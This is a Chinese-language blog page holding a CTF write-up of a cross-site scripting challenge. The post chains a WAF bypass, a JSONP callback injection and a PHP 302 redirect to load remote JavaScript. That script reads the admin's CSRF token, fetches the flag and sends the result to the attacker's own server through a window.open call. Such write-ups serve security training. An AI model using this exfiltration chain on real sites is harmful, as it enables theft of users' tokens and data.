<!DOCTYPE html><html lang="zh-CN"><head><meta name="generator" content="Hexo 3.8.0"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><title>一次有趣的XSS弹弹乐 | Cryscat's Blog</title><meta name="description" content="一次有趣的XSS弹弹乐"><meta name="keywords" content="CTF,XSS,Trick,Note"><meta name="author" content="Cryscat"><meta name="copyright" content="Cryscat"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/favicon.ico"><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="canonical" href="http://www.cryscat.com/2019/04/08/一次有趣的XSS弹弹乐/"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:title" content="一次有趣的XSS弹弹乐"><meta name="twitter:description" content="一次有趣的XSS弹弹乐"><meta name="twitter:image" content="http://www.cryscat.com/img/avatar.jpg"><meta property="og:type" content="article"><meta property="og:title" content="一次有趣的XSS弹弹乐"><meta property="og:url" content="http://www.cryscat.com/2019/04/08/一次有趣的XSS弹弹乐/"><meta property="og:site_name" content="Cryscat's Blog"><meta property="og:description" content="一次有趣的XSS弹弹乐"><meta property="og:image" content="http://www.cryscat.com/img/avatar.jpg"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="prev" title="ISCC2019 Web Writeup" href="http://www.cryscat.com/2019/05/22/ISCC2019-Web-Writeup/"><link rel="next" title="嘉韦斯杯Writeup" href="http://www.cryscat.com/2019/04/01/嘉韦斯杯Writeup/"><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  highlight_copy: 'true',
  highlight_lang: 'true',
  highlight_shrink: 'false',
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    title: '添加书签',
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天'

  
}</script></head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div class="auto_open" id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#这是标题-๑¯∀¯๑"><span class="toc-number">1.</span> <span class="toc-text">这是标题(๑¯∀¯๑)</span></a></li></ol></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://cdn.jsdelivr.net/gh/jerryc127/CDN@latest/Photo/post.png)"><div id="page-header"><span class="pull-left"> <a class="blog_title" id="site-name" href="/">Cryscat's Blog</a></span><div class="open toggle-menu pull-right"><div class="menu-icon-first"></div><div class="menu-icon-second"></div><div class="menu-icon-third"></div></div><div class="menu_mask"></div><span class="pull-right menus"><div class="mobile_author_icon"><img class="lozad avatar_img" src="/img/avatar.jpg" onerror="onerror=null;src='/img/friend_404.gif'"></div><div class="mobile_post_data"><div class="mobile_data_item text-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">7</div></a></div></div><div class="mobile_data_item text-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">14</div></a></div></div></div><hr><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> Tags</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> Link</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> About</span></a></div><script>document.body.addEventListener('touchstart', function(){ });</script></div></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title"><div class="posttitle">一次有趣的XSS弹弹乐</div></div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 发表于 2019-04-08<span class="post-meta__separator">|</span><i class="fa fa-history" aria-hidden="true"></i> 更新于 2019-04-09</time></div></div></div><div class="layout layout_post" id="content-inner">   <article id="post"><div class="article-container" id="post-content"><img data-src="/2019/04/08/一次有趣的XSS弹弹乐/1.jpg" class="lozad">
<h1 id="这是标题-๑¯∀¯๑"><a href="#这是标题-๑¯∀¯๑" class="headerlink" title="这是标题(๑¯∀¯๑)"></a>这是标题(๑¯∀¯๑)</h1><p>主页：<br><img data-src="/2019/04/08/一次有趣的XSS弹弹乐/2.jpg" class="lozad"></p>
<p>对着输入框一顿乱锤没反应，还是老老实实注册了个账号登进去了<br>登进去是这样的：<br><img data-src="/2019/04/08/一次有趣的XSS弹弹乐/3.jpg" class="lozad"></p>
<p>site填入自己的服务器地址发现他会访问。经过简单测试发现这里存在反射型XSS，通过大写可以绕过waf</p>
<blockquote>
<p>&lt;SCRIPT>alert(1)&lt;SCRIPT></p>
</blockquote>
<img data-src="/2019/04/08/一次有趣的XSS弹弹乐/4.jpg" class="lozad">
<p>但输入的内容不符合网站格式，admin不会访问</p>
<p>这里发现一个getInfo接口，返回 jsonp 数据，也存在反射型xss,而且没上waf<br><img data-src="/2019/04/08/一次有趣的XSS弹弹乐/5.jpg" class="lozad"><br><img data-src="/2019/04/08/一次有趣的XSS弹弹乐/6.jpg" class="lozad"></p>
<p>访问接口需要进行referer验证<br><img data-src="/2019/04/08/一次有趣的XSS弹弹乐/7.jpg" class="lozad"></p>
<p>flag是通过getflag接口获取的，需要参数是csrftoken<br><img data-src="/2019/04/08/一次有趣的XSS弹弹乐/8.jpg" class="lozad"><br>获取ﬂag的权限是通过 jsonp 中的 username验证的 ，这个 username 是后端解密 cookie 中的username 得到的明文。cookie 中的 username 受 http-only 保护不可读取，也没有能显示出 cookie 中加密的 username 的页面，于是只能控制admin去访问ﬂag页面然后返回给我们了</p>
<p>这时候的攻击思路就比较明确了：site填入<code>http://xxxx/action.php?callback=\&lt;js代码&gt;</code>让admin访问这个url触发XSS获取自己的csrftoken值，然后带着这个值访问getflag接口，最后再将flag内容发送到我们的服务器。<br>但是又遇到一个问题：site可填入的url长度太短了，根本不可能填入这样一个附带JS脚本的url，那只能另辟蹊径了</p>
<p>另一条攻击链：</p>
<blockquote>
<p>链接 –&gt; 302跳转到 jsonp xss –&gt; 提取 jsonp 中 csrftoken  –&gt; xhr 控制读取 flag –&gt; 返回flag到服务器</p>
</blockquote>
<p>site:<code>http://my_ip/xss.php</code><br>xss.php:<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">header(<span class="string">'Location: http://target_ip/action.php?callback=&lt;script+src="http://my_ip/xss.js"&gt;&lt;/script&gt;'</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>HTTP_REFERER 是由 html 文档对象 document 提供的,Location 是 http 协议的头部内容,浏览器一旦收到，就执行了,此时 document 尚未创建,所以此时的referer还是<code>http://target_ip/loged.php</code></p>
<p>xss.js:<br><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">window</span>.onload = <span class="function"><span class="keyword">function</span> <span class="title">cryscat</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">	<span class="keyword">var</span> obj = <span class="built_in">eval</span>(<span class="string">'('</span>+<span class="built_in">document</span>.body.innerText+<span class="string">')'</span>);</span><br><span class="line">	<span class="keyword">var</span> ct = obj.csrftoken;</span><br><span class="line">	<span class="keyword">var</span> xml = <span class="keyword">new</span> XMLHttpRequest();</span><br><span class="line">	xml.open(<span class="string">'Get'</span>,<span class="string">'http://target_ip/getflag.php?csrftoken='</span>+ct,<span class="literal">false</span>);</span><br><span class="line">	xml.send();</span><br><span class="line">	<span class="keyword">var</span> res = xml.responseText;</span><br><span class="line">	<span class="built_in">window</span>.open(<span class="string">'http://my_ip/?msg='</span>+res);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>最后返回的data:</p>
<blockquote>
<p>{‘flag’:’flag{j50nP_1s_VulN3r4bLe}’,’csrftoken’:’058807fed91d1b8807688bd258710cbe’} IP: 111.198.29.45  Referer: <a href="http://111.198.29.45:30987/action.php" target="_blank" rel="noopener">http://111.198.29.45:30987/action.php</a>? callback=%3Cscript+src=%22<a href="http://my_ip/xss.js%22%3E%3C%2Fscript%3E" target="_blank" rel="noopener">http://my_ip/xss.js%22%3E%3C%2Fscript%3E</a></p>
</blockquote>
<p>Thank you for reading.(・ω&lt;)</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Cryscat</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://www.cryscat.com/2019/04/08/一次有趣的XSS弹弹乐/">http://www.cryscat.com/2019/04/08/一次有趣的XSS弹弹乐/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://www.cryscat.com">Cryscat's Blog</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/CTF/">CTF    </a><a class="post-meta__tags" href="/tags/XSS/">XSS    </a><a class="post-meta__tags" href="/tags/Trick/">Trick    </a><a class="post-meta__tags" href="/tags/Note/">Note    </a></div><div class="post_share"><div class="social-share" data-image="/img/avatar.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script></div></div><div class="post-reward"><a class="reward-buttom"><i class="fa fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><img class="lozad post-qr-code__img" src="/img/wechat.jpg"><div class="post-qr-code__desc">微信</div></li><li class="reward-item"><img class="lozad post-qr-code__img" src="/img/alipay.jpg"><div class="post-qr-code__desc">支付宝</div></li></ul></div></a></div><nav class="pagination_post" id="pagination"><div class="prev-post pull-left"><a href="/2019/05/22/ISCC2019-Web-Writeup/"><img class="prev_cover lozad" data-src="https://cdn.jsdelivr.net/gh/jerryc127/CDN@latest/cover/default_bg.png" onerror="onerror=null;src='/img/404.jpg'"><div class="label">上一篇</div><div class="prev_info"><span>ISCC2019 Web Writeup</span></div></a></div><div class="next-post pull-right"><a href="/2019/04/01/嘉韦斯杯Writeup/"><img class="next_cover lozad" data-src="https://cdn.jsdelivr.net/gh/jerryc127/CDN@latest/cover/default_bg.png" onerror="onerror=null;src='/img/404.jpg'"><div class="label">下一篇</div><div class="next_info"><span>嘉韦斯杯Writeup</span></div></a></div></nav><hr><div id="post-comment"><div class="comment_headling"><i class="fa fa-comments fa-fw" aria-hidden="true"></i><span> 评论</span></div><div id="disqus_thread"></div><script>var unused = null;
var disqus_config = function () {
  this.page.url = 'http://www.cryscat.com/2019/04/08/一次有趣的XSS弹弹乐/';
  this.page.identifier = '2019/04/08/一次有趣的XSS弹弹乐/';
  this.page.title = '一次有趣的XSS弹弹乐';
}
var d = document, s = d.createElement('script');
s.src = "https://" + '' +".disqus.com/embed.js";
s.setAttribute('data-timestamp', '' + +new Date());
(d.head || d.body).appendChild(s);</script></div></div></div><footer><div id="footer"><div class="copyright">&copy;2018 - 2019 By Cryscat</div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><section class="rightside" id="rightside"><a id="to_comment" href="#post-comment"><i class="scroll_to_comment fa fa-comments"></i></a><i class="fa fa-plus" id="font_plus" title="放大字体"></i><i class="fa fa-minus" id="font_minus" title="缩小字体"></i><i class="nightshift fa fa-moon-o" id="nightshift" title="夜间模式"></i></section><div class=" " id="post_bottom"><div id="post_bottom_items"><a id="mobile_to_comment" href="#post-comment"><i class="mobile_scroll_to_comment fa fa-comments"></i></a><i class="fa fa-list" id="mobile_toc"></i><div id="toc_mobile"><div class="toc_mobile_headline">目录</div><ol class="toc_mobile_items"><li class="toc_mobile_items-item toc_mobile_items-level-1"><a class="toc_mobile_items-link" href="#这是标题-๑¯∀¯๑"><span class="toc_mobile_items-number">1.</span> <span class="toc_mobile_items-text">这是标题(๑¯∀¯๑)</span></a></li></ol></div></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/js-cookie@2/src/js.cookie.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="/js/third-party/fireworks.js"></script><script src="/js/nightshift.js"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page@1.2.2/instantpage.min.js" type="module"></script><script src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script><script>const observer = lozad(); // lazy loads elements with default selector as '.lozad'
observer.observe();</script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"scale":1,"hHeadPos":0.5,"vHeadPos":0.618,"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"superSample":2,"width":170,"height":340,"position":"right","hOffset":-20,"vOffset":-60},"mobile":{"show":true,"scale":0.8},"react":{"opacity":0.9},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body></html>